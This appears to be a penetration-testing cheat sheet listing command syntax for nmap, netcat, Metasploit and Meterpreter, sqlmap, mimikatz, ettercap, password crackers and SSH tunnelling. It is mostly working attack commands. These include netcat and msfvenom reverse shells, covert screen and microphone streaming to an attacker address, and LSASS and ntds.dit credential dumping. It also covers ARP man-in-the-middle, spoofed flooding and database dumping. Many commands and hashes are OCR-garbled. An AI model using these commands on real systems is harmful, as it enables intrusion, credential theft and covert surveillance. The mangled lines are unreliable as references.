Links
Comment on page

Tool Syntax

How to use the tools

Nmap command

Scanning methods

Switch Explanation
Text
-sp
Scan with ping
-sS
Scanning with syn
-sT
Scanning with connection
-sU
Scanning with udp
-so
Scanning with protocol
-sv
Scanning along with versions
-sC
Scanning with traceroute
-T4 Setting the scanning speed between 0 and 5
-oA
Scanning output with all formats
-iL list.txt
Scan the contents of the list

Capabilities

Switch Explanation
Text
-ox file
Write inside the xml file
-oG file
Writing inside the grep file
-oA file
Storage with 3 formats
-iL file
Reading hosts from inside my file
-exclude file file
Except for the hosts in the file

Advanced features

Switch Explanation
Text
-sV -p โ€“script=banner
Banners
โ€“traceroute
Draw a route map
โ€“ttl
ttl code
โ€“script
Script

Firewall evasion

Switch Explanation
Text
-f
Crossed fasteners
-s ip
source spoof
-g #
spoof source port
-D ip , ip
Bait
โ€“mtu #
Setting the MTU size
โ€“spoof-mac mac
spoof mac address
โ€“data-length size
Size
โ€“scan-delay script
Script
โ€“min-rate=X
Determining the minimum number of requests sent per second

Convert xml output to html

xsltproc nmap.xml -o nmap.html

Create active hosts

nmap -sP -n -oX out.xml 1.1.1.0/24 2.2.2.0/24 | grep "Nmap" | cut -d " " -f
5 live hosts.txt

Compare nmap results

ndiff scanl.xml scan2.xml

reverse dns lookup in ip range

nmap -R -sL -dns-server server 1.1.1.0/24

ids test (xmas scan with ips bait and spoofing)

for x in {1 .. lOOOO .. 1);do nmap -T5 -sX -S spoof-source-IP -D
comma-separated with no spaces list of decoy IPs --spoof-mac aa:bb:cc:dd:ee:ff
-e eth0 -Pn targeted-IP. Done

List of nmap scripts

name
Explanation
List of shared routes smb-enum-shares.nse

Wireshark software

Filter Explanation
Text
eth.addr/eth.dst.eth.src
Mac
rip.auth.passwd
Password RIP
ip.addr/ip.dst/ip.src (ipv6.)
IP
tcp.port/tcp.dstport/tcp.srcport
TCP ports
tcp.flags (ack,fin,push,reset,syn,urg)
TCP flags
udp.port/udp.dstport/udp.srcport
UDP ports
http.authbasic
Basic authentication authentication
http.www_authentication
Authentication of HTTP authentication
http.data
HTTP data
http.cookie
HTTP cookies
http.referer
HTTP referrer path
http.server
HTTP servers
http.user agent
The user-agent section in HTTP
wlan.fc.type eq 0
802.11 management frame
wlan.fc.type eq 1
802.11 control frame
wlan.fc.type eq 0
802.11 data frames
wlan.fc.type subtype eq 0 (1=reponse)
802.11 association request
wlan.fc.type_subtype eq 2 (3=response)
802.11 reassociation req
wlan.fc.type_subtype eq 4 (5=response)
802.11 probe request
wlan.fc.type_subtype eq 8
802.11 beacon
wlan.fc.type subtype eq 10
802.11 disassociate
wlan.fc.type=subtype eq 11 (12=deauthenticate)
802.11 authentication

Command operators

eq OR ==
ne OR !=
gt OR
Lt. OR
ge OR =
le OR =

Logical operators

and OR &&
or OR ||
xor OR ^^
not OR!

Netcat command

Fundamental

Connect to [TargetiP] Listener on [port]:
$ nc [Target P] [port]
โ€‹
Start Listener:
$ nc -1 -p [port]

Start HTTP SOCKS server at Automation-Server

./ncat - l 3128 -proxy -type http &

Scan ports

TCP Port Scanner in port range [startPort] to [endPort]:
$ nc -v -n -z -wl [TargetiP] [startPort]-[endPort]

transfer files

send file
nc.exe 10.10.10.10 < "file.log"
โ€‹
download file
nc -vnlp 1234 > file.txt
Grab a [filename] from a Listener:
1. Start Listener to push [filename]
$ nc -1 -p [port] [filename]
2. Connect to [TargetiP] and Retrieve [filename]
$ nc -w3 [TargetiP] [port] [filename]
โ€‹
Push a [filename] to Listener:
1. Start Listener to pull [filename]
$ nc -1 -p [port] [filename]
2. Connect to [TargetiP] and push [filename]
$nc -w3 [TargetiP] [port] [filename]

Backdoor shells

Linux Shell:
$ nc -1 -p [port] -e /bin/bash
Linux Reverse Shell:
$ nc [LocaliP] [port] -e /bin/bash
Windows Shell:
$ nc -1 -p [port] -e cmd.exe
Windows Reverse Shell:
$ nc [LocaliP] [port] -e cmd.exe

Use VLC for streaming

Use cvlc \(command line VLC\) on target to migrate popups

Saving and streaming the screen through the udp protocol to the attackerโ€™s address and port 1234

# Start a listener on the attacker machine
vlc udp://@:1234
โ€‹
-- OR --
โ€‹
# Start a listener that stores the stream in a file.
vlc udp://@:1234 :sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,
ab=128,channels=2,samplerate=44100):file{dst=test.mp4) :no-sout-rtp-sap
:no-shout-standard-sap :ttl=1 :shout-keep
โ€‹
# This may make the users screen flash. Lower frame rates delay the video.
vlc screen:// :screen-fps=25 :screen-caching=100
:sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,ab=128,channels=2,sam
plerate=44100):udp{dst=attackerip :1234) :no-sout-rtp-sap :no-soutstandard-
sap :ttl=1 :sout-keep

Save and stream the screen in http protocol

# Start a listener on the attacker machine
vlc http://server.example.org:BOBO
โ€‹
-- OR --
โ€‹
# Start a listener that stores the stream to a file
vlc http://server.example.org:BOBO -sout=#
transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,ab=128,channels=2,samp
rate=44100):file{dst=test.mp4)
โ€‹
# Start streaming on the target machine
vlc screen:// :screen-fps=25 :screen-caching=100
:sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,ab=128,channels=2,sam
plerate=44100):http{mux=ffmpeg{mux=flv),dst=:8080/) :no-sout-rtp-sap :nosout-
standard-sap :ttl=1 :sout-keep

Save and stream on broadcast

# Start a listener on attacker machine for multicast
vlc udp://@ multicastaddr :1234
โ€‹
# Broadcast stream to a multicast address
vlc screen:// :screen-fps=25 :screen-caching=100
:sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,ab=128,channels=2,sam
plerate=44100):udp{dst= multicastaddr :1234) :no-sout-rtp-sap :no-soutstandard-
sap :ttl=1 :sout-keep

Save and record the screen in a file

vlc screen:// :screen-fps=25 :screen-caching=100
:sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,ab=128,channels=2,sam
plerate=44100):file{dst=C:\\Program Files (x86)\\VideoLAN\\VLC\\test.mp4)
:no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep

Record and stream microphone on udp

vlc dshow:// :dshow-vdev="None" :dshow-adev="Your Audio Device"

SSH command

/etc/ssh/ssh known hosts #System-wide known hosts
-/.ssh/known_hosts #Hosts user has logged into
sshd-generate #Generate SSH keys (DSA/RSA)
ssh keygen -t dsa -f /etc/ssh/ssh_host_dsa_key #Generate SSH DSA keys
ssh keygen -t rsa -f /etc/ssh/ssh_host_rsa_key #Generate SSH RSA keys
โ€‹
If already in ssh session, press SHIFT -C to configure tunnel
Port forwarding must be allowed on the target
/etc/ssh/sshd_config - AllowTcpForwarding YES

Connect with ssh with specific port

ssh [email protected] -p 8222

Reverse port forwarding using the tunnel (in the support user reverse shell)

ssh -R 4446:127.0.0.1:3128 [email protected]
http 127.0.0.1 4446

Set x11 victim to attacker

xhost+
vi -/.ssh/config- Ensure 'ForwardXll yes'

Create port forward on port 8080 and transfer to port 443 of the attacker

ssh -R8080:12-.0.0.1:443 [email protected].

Using port forward on the attackerโ€™s port 8080 and transferring information using ssh tunnel and port 3300 3.3.3.3

ssh -18080:3.3.3.3:443 [email protected]

Dynamic tunnel using proxychain. Also, the file /etc/proxychain.conf to set the port (1080)

In a separate terminal run:
proxychains nmap -sT -p80,443 3.3.3.3

Create multi-hop ssh tunnel

ssh -L 8888:127.0.0.1:8444 50mctf@MY_VPS
ssh -v -o PubkeyAuthentication=no -o PreferredAuthentications=password -o GatewayPorts=yes -fN -R *:8444:172.28.0.3:80 50mctf@MY_VPS

Metasploit software

Command
Description
msfconsole r file.rc
Load resource file
msfcli | grep exploit/window
List of Windows exploits
rnsfencode -l
list of encodes
msfpayload -h
List of payloads
show exploits
Display exploits
show auxiliary
show auxiliary module
show payloads
Show payloads
search string
Search for a specific string
search exploit string
Search exploits
searchsploit -m exploits/php/webapps/45161.py
Copy the Xploit file in the current path
info module
Display module information
use module
Load Xploit or Module
show options
Display module properties
show advanced
Show advanced settings
set option value
Set value
sessions -v
List of meetings: -k # (delete) -u # (Update Meterpreter)
sessions -s script
Run the Meterpreter script in all sessions
jobs -l
List all jobs (-k # - kill)
exploit -j
Run exploit as job
route add ip nmask sid
Rotation or Pivoting
loadpath /home/modules
Load tradeparty tree
irb
shell ruby implementation
connect -s ip 443
connect to ssl (NC clone)
route add ip mask session id
added route ยทin the pivot
exploit/multi/handler - set ExitOnSession False
Show more settings
Shells
set ConsoleLogging true (also
SessionLogging)
Enable reporting

Sqlmap command

Send request Get

sqlmap.py -u "http://url?id=1&str=val"

Send Post request

sqlmap.py -u "http://url" --data="id=1&str=val"

SQL injection in a specific parameter and knowing the type of database

sqlmap.py -u "http://url" --data="id=l&str=val" -p "id"
-b --dbms="mssqllmysqlloraclelpostgres"

SQL injection on the page requiring authentication

1. Login and note cookie value (cookie1=val1, cookie2=val2)
sqlmap.py -u "http:// url "--data="id=l&str=val" -p "id"
--cookie="cookiel=vall;cookie2=val2"

SQL injection and getting the database version and its name and user

./sqlmap.py -u "http://url" --data="id=1&str=val" -p "id" -b --current-db
--current-user

SQL injection and get database tables db=testdb

sqlmap.py -u "http://url" --data="id=1&str=val" -p "id" --tables -D
"testdb"

SQL injection and receiving table columns

sqlmap.py -u "http://url" --data="id=l&str=val" -p "id" --columns -T
"users"

Read from file

sqlmap.py -r req.txt

Get the records of the specified table from the specified database

sqlmap -r req -D openemr -T users_secure --dump

Using the delay technique

sqlmap -r req --technique=T
โ€‹more infoโ€‹

Bypass waf with unicode

sqlmap -r json --tamper=charunicodeescape --dump --level=5 --risk=3 --dbs --columns

msf

Creating meterpreter payload (for Linux: -t file -o callback)

./msfpayload windows/meterpreter/reverse tcp LHOST=ip LPORT=port R |
./msfencode -t exe -o callback.exe -e x86/shikata_ga nai -c 5

Create payload with bound meterpreter

./msfpayload windows/meterpreter/bind_tcp RP.OST=ip LPORT=port X
cb.exe

Creating a Java reverse shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.14 LPORT=9999 -f WAR > exploit.war

Creating a reverse shell for Windows with msfvenom

msfvenom -p windows/shell_reverse_tcp lhost=ip lport=port -f exe --platform windows >reverse.exe

Generate encoded payload using msfvenom

./msfvenorn --payload windows/meterpreter/reverse~tcp --format exe
template calc.exe -k --encoder x86/shikata_ga_nai -i 5 LHOST=1.1.1.1
LPORT=443 callback.exe

Start database msf (bt5=mysql,kali=postgresql)

/etc/rc.d/rc.mysqld start
msf db_create root:pass@localhost/metasploit
msf load db mysql
msf db connect root:pass@localhost/metasploit
msf db=import nmap.xml
โ€‹
--- Kali ---
# service postgresql start
# service metasploit start

return the shell (by default it will run notepad and injection)

msf use post/windows/manage/multi meterpreter inject
msf set IPLIST attack ip
msf set LPORT callback port
msf set PIDLIST PID to inject, default creates new notepad
msf set PAYLOAD windows/meterpreter/reverse_tcp
msf set SESSION meterpreter session ID

Display the html banner in the internal network

msf route add ip/range netmask meterpreter ID
msf use post/multi/gather/ping sweep # Set options and run
msf use /auxiliary/scanner/portscan/tcp # Set options and run
msf hosts-u-S x.x.x -R #Searches for x.x.x.' and sets
# RHOSTS
msf use auxiliary/scanner/http/http version # Set options and run
msf services -v -p 80-S x.x.x -R - #Displays IPs x.x.x.' with port
#80 open

Meterpreter

Command
Explanation
Help
List of available commands
sysinfo
Display system information
p.s List of processes
getpid
List of available PID
upload file C:\Program Files\
Upload file
download file
Get the file
reg command
Interaction with the registry
rev2self
Back to main user
shell
Transfer to interactive shell
migrate PID
Change to another PID
background
The current process behind the background
keys can (start|stop|dump)
Start/stop/delete keylogger
execute -f cmd.exe -i
Run cmd.exe and interact with it
execute -f crnd.exe -i -H -t
Run cmd.exe as a hidden process and get all the tokens
has dump
Get all local hashes
run script
Running the script (/scripts/meterpreter)
port fwd [add I delete] -lL 127.0.0.1 443 -r 3.3.3.3 -p 3389
Create port forward on port 3389 in the current session and remote desktop access on port 443

Increasing access level

use priv
getsystem

Impersonation token (removing the token will stop impersonation)

use incognito
list tokens -u
impersonate token domain\\user

Using nmap in meterpreter socks proxy

1. msf sessions #Note Meterpreter ID
2. msf route add 3.3.3.0 255.255.255.0 id
3. msf use auxiliary/server/socks4a
4. msf run
5. Open a new shell and edit /etc/proxychains.conf
i. #proxy_dns
ii. #socks4 127.0.0.1 9050
iii. socks4 1.1.1.1 1080
6. Save and close the conf file
7. proxychains nmap -sT -Pn -p80,:35,s45 3.3.3.3
meterprete irb
client.railgun.user32.MessageBoxA(O,"got","YOU","MB_OK")

Creating a stable Windows service

msf use post/windows/manage/persistence
msf set LHOST attack ip
msf set LPORT callback port
msf set PAYLOAD_TYPE TCPIHTTPIHTPS
msf set REXENAHE filename
msf set SESSION meterpreter session id
msf set STARTUP SERVICE
meterpreter run post/windows/gather/dumplinks

Create a new process and command tree c:\

execute -H -f cmd.exe -a '/c tree /F /A c:\ C:\temp\tree.txt'

Ettercap software

Main-In-Middle attack using filters

ettercap.exe -I iface -M arp -Tq -F file.ef MACs / IPs / Ports
MACs / IPs / Ports
#i.e.: // 80,443 // = any MAC, any IP, ports 80,443

Main-In-Middle attack on subnet with functional fitters

ettercap -T -M arp -F filter // //

Switch flood attack

ettercap -TP rand flood

Ettercap filters

Compile ettercap filters

etterfilter filter.filter -o out.ef

Example filter - remove vpn traffic and decrypt http traffic

if lip.proto == UDP && udp.dst == 500) I
drop();
kill(); }
if I ip.src == 'ip' ) (
if (tcp.dst == 80) (
if (search(DATA.data, "Accept-Encoding")) (
replace("Accept-Encoding","Accept-Rubbish!");
msg("Replaced Encoding\n");
}
}
}

Mimikatz command

1. Upload mimikatz.exe and sekurlsa.dll to target
2. execute mirnikatz
3. mimikatz# privilege: :debug
4. mimikatz# injeet::proeess lsass.exe securlsa.dll
5. mimikatz# @getLogonPasswords
6. securlsa::minidump /users/redteam/Desktop/lsass.DMP
7. securlsa::LogonPasswords
Or
mimikatz# sekurlsa::tickets /export
mimikatz# kerberos::ptt <TICKET PATH>
Or
#cleartext password and hash
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "token::elevate" "lsadump::secrets" "exit"

Hping command3

hping3 targetiP --flood --frag --spoof ip --destport # --syn

Arping command

./arping -I eth# -a # arps

Wine command

ed /root/.wine/drive e/HinGW/bin
wine gee -o file.exe /tmp/ eode.e
wine file.exe

Grub software

GRUB Henu: Add 'single' end of kernel line. Reboot. Change root password. reboot

Hydra command

hydra -1 ftp -P words -v targetiP ftp

hashcat software

NTLMv2 crack

hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force

John the ripper software

Crack with word list

$ ./john -wordfile:pw.lst -format: format hash.txt

Sample formats

$ john --format~des username:SDbsuge8iC58A
$ john --format~lm username:$L~$a9c604d244c4e99d
$ john --format~md5 $1$12345678$aiccj83HRD8o6ux1bVx7D1
โ€‹
$ john --format~raw-sha1 A9993E364706816A8A3E25717850C26C9CDOD89D
โ€‹
# For --format~netlmv2 replace $NETLM with $NETLMv2
$ john --format~netlm
$NETLM$1122334455667788$0836F0858124F338958-5F81951905DD2F85252CC-318825
username:$NETLM$ll22334455667788$0836F0858124F338958"5F81951905DD2F85252CC7
318825
username:$NETLM$1122334455667788$0836F0858124F338958-5F81951905DD2F85252CC7
318825:::::::
โ€‹
# Exactly 36 spaces between USER and HASH (SAP8 and SAPG)
$ john --format~sapb
ROOT $8366A4E9E68"2C80
username:ROOT $8366A4E9E68"2C80
โ€‹
$ john --format=sapg
ROOT $1194E38F1489F3F8DA18181F14DE8"0E"8DCC239
username:ROOT
$1194E38F1489F3F8DA18181F14DE8-0E-8DCC239
โ€‹
$ john --format=sha1-gen
$SHA1p$salt$59b3e8d63-cf9"edbe2384cf59cb"453dfe30-89
username:$SHA1p$salt$59b3e8d63-cf9"edbe2384cf59cb-453dfe30-89
โ€‹
$ john --format=zip
$zip$'0'1'8005b1b"d07""08d'dee4
username:$zip$'0'1'8005b1b-d0"-"08d'dee4

List of passwords

Creating different words based on one word

#Add lower(@), upper(,), ~umber(%), and symbol(^) I to the end of the word
crunch 12 12 -t baseword@,%^ wordlist.txt
โ€‹
Use custom special character set and add 2 numbers then special character
maskprocessor -custom-charset1=\!\@\#\$ baseword?d?d?l wordlist.txt
โ€‹
generate wordlist from website with number
cewl -d 5 -m 3 -w wordlist http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers

Vsown command

1. Download: http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs
2. Create a new Shadow Copj
a. cscript vssown.vbs /start (optional)
b. cscript vsown.vbs /create
3. Pull the following files frorr. a shadow copj:
a. Copy
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\
ntds\ntds.dit.
b. copj
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\
System32\config\SYSTEM.
C. COpj
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\
system32\config\SAM.
4. Copj files to attack box.
5. Download tools: http://www.ntdsx~ract.com/downloads/ntds dump_hash.zip
6. Configure and Make source code for libesedb from the extracted package
a. cd libesdb
b. chmod +x configure
c. ./configure && make
Use esedbdumphash to extract the data table from ntds.dit.
a. cd esedbtools
b. . I esedbdumphash ../../ntds.dit

File hash

Hash length

MD5 16 bytes
SHA-1 20 bytes
SHA-256 32 bytes
SHA-512 64 bytes

Software with different hash databases

http://isc.sans.edu/tools/hashsearch.html
# dig +short md5 .md5.dshield.org TXT
Result = "filename I source" i.e. "cmd.exe I NIST"

Malware hash database

http://www.team-cymru.org/Services/MHR
# dig +short [MD5|SHA-1].malware.hash.cymru.com TXT
Result = last seen timestamp AV detection rate
Convert timestamp= perl-e 'print scalar localtime( timestamp ), "\n"'

Search in metadata files

https://fileadvisor.bit9.com/services/search.aspx

Search the virustotal database

https://www.virustotal.com/#search

Guess the password of the zip file

fcrackzip -v -D -u -p /usr/share/wordlists/rockyou.txt secret.zip

Guess the password of the winrm service

crackmapexec winrm <IPS> -u <USERS> -p <PASSWORDS>

Guess the password of the smb service

crackmapexec smb <IP> -u <USER> -p <PASS> --shares

Connect to mssql with impackt

mssqlclient.py -port 1433 [email protected]

powershell download files

powershell iwr -usebasicparsing http://192.168.2.2/mimikatz.exe -OutFile mimikatz.exe
โ€‹

List of Pods

๐‘˜๐‘ข๐‘๐‘’๐‘๐‘ก๐‘™ ๐‘”๐‘’๐‘ก ๐‘๐‘œ๐‘‘

Check if you have rights to exec into any pods

./๐‘˜๐‘ข๐‘๐‘’๐‘๐‘ก๐‘™ ๐‘Ž๐‘ข๐‘กโ„Ž ๐‘๐‘Ž๐‘› โˆ’ ๐‘– ๐‘’๐‘ฅ๐‘’๐‘ ๐‘๐‘œ๐‘‘๐‘ 

exec into sensitive-pod

./๐‘˜๐‘ข๐‘๐‘’๐‘๐‘ก๐‘™ ๐‘’๐‘ฅ๐‘’๐‘ โˆ’ ๐‘–๐‘ก ๐‘ ๐‘’๐‘›๐‘ ๐‘–๐‘ก๐‘–๐‘ฃ๐‘’ โˆ’ ๐‘๐‘œ๐‘‘ /๐‘๐‘–๐‘›/๐‘๐‘Ž๐‘ โ„Ž

More information about the environment

kubectl get nodes -o wide

RouterSploit

Discover Devices

python rsf.py -m discovery

Scan for vulnerabilities